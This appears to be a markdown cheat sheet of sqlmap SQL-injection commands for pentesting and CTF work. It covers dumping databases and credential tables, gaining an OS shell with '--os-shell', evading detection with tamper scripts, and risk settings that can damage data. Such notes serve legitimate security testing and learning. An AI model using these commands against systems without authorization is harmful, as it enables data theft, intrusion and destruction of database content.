Skip to content

Latest commit

 

History

History
196 lines (140 loc) · 3.84 KB

sqlmap.md

File metadata and controls

196 lines (140 loc) · 3.84 KB
Raw

SQLMap

        ___
       __H__
 ___ ___[']_____ ___ ___  {version#stable}
|_ -| . [(]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

Reference:

GET URL Param

sqlmap -u http://10.10.10.10/debug.php?id=1 -p "id" --dbms=mysql --dump

POST body

sqlmap -u http://10.10.10.10/login.php --method POST --data "username=blah&password=blah&submitButton=Log+In" -p "password"

Captured request (usually POST/PUT)

Save a burp request to a file named request.txt:

sqlmap -r request.txt -p someparam

If there is a Host: header, then sqlmap will figure out the target on its own.

Parameters including cookies should also be detected (probably), but don't rely on this to work.

Example credentials search workflow:

Get database names:

sqlmap -r request.txt --dbs

Get tables of a database:

sqlmap -r request.txt -D admin --tables

Dump content of a table:

sqlmap -r request.txt -D "admin" -T users --dump

Common Params

Parameters you want to test specfically

-p "param,param2"

Discover databases:

--dbs

Discover Tables:

-D "database_name"
--tables

Table content:

-T <table_name>
--dump

Attempt to gain Shell:

--os-shell

Specify known database type:

--dbms=mysql

Risk and level

--level <int>
--risk <int>

This is sadly not all that well documented. But in general --level increases the number of requests sent, so the number of test cases for each attack type. Higher --risk increases the chance to cause Denial of Service (DoS) or damage database content.

--level max is 5

  • level 1 default
  • level 2 adds HTTP Cookie header testing
  • level 3 adds HTTP User-Agent/Referer headers testing
  • level 4 ????
  • level 5 adds Host header testing

--risk max is 3

  • risk 1 default
  • risk 2 adds heavy time-based SQL query injections
  • risk 3 adds OR-based SQL injection tests (might damage database content!)

It should be mentioned that there is no "safe" --level or --risk to run SQLMap in a production environment. You can always cause damage depending on how poorly the API is coded by the developers.

Get rid of cached session data

Sqlmap tends to cache a lot of data, this might be annoying if there was a false positive or if you changed your captured request file. Do this to get rid of it:

--flush-session
--fresh-queries

(Burp) Proxy

--proxy http://localhost:8080

Technique

  • Stacked queries (S)
  • Union query based (U)
  • Error based (E)
  • Inline queries (I)
  • Boolean blind (B)
  • Time based blind (T)

Specify single technique or technique order

--technique U
--technique=BEUSTQ

For union based attacks you can specify the number of unions cols to test if the default is too small:

--union-cols=11
--union-cols=1-20

Cookie

--cookie "cookiename=
--cookie "cookiename=cookieprefix"

Unicode Nonsense

CTFs sometimes do this in order to make it harder for you, they throw in some weird characters which are hard to work with on a utf-8 shell. One of the following parameters might help.

Convert output to hex during retrieval:

--hex

Redump entries having unknown character marker (?)

--repair

Character encoding for data retrieval

--encoding=

Detection Evasion Using Tamper Scripts

--tamper=charencode
--tamper=charencode,appendnullbyte,escapequotes

Before and after injection point

If you consistently want to add some string data before (prefix) or after (suffix) the injected paylods, then use these options. For example some brackets that need to be opened/closed to make the injection work.

--prefix "<str>"
--suffix "<str>"